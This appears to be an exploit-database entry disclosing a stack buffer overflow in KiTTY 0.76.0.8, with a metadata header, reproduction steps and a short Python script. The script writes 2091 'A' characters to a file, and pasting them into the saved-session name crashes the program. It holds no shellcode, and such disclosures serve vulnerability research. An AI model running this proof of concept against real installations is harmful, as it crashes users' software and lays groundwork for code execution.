# Exploit Title: Kitty 0.76.0.8 Stack Buffer Overflow # Discovered by: Yehia Elghaly # Discovered Date: 2022-06-08 # Vendor Homepage: http://www.9bis.net/kitty/index.html#!index.md # Software Link : https://www.fosshub.com/KiTTY.html?dwl=kitty_portable-0.76.0.8.exe # Tested Version: 0.76.0.8 # Vulnerability Type: Buffer Overflow # Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64 # Description: Kitty 0.76.0.8 Stack Buffer Overflow # Steps to reproduce: # 1. - Run the python script and it will create exploit.txt file. # 3. - Kitty 0.76.0.8 # 4. - Sessions -> Save # 5. - Paste the characters of txt to Saved/Sessions then click save # 6. - Crashed # Note: ECX Overwwrite #!/usr/bin/python exploit = 'A' * 2091 try: file = open("exploit.txt","w") file.write(exploit) file.close() print("POC is created") except: print("POC not created")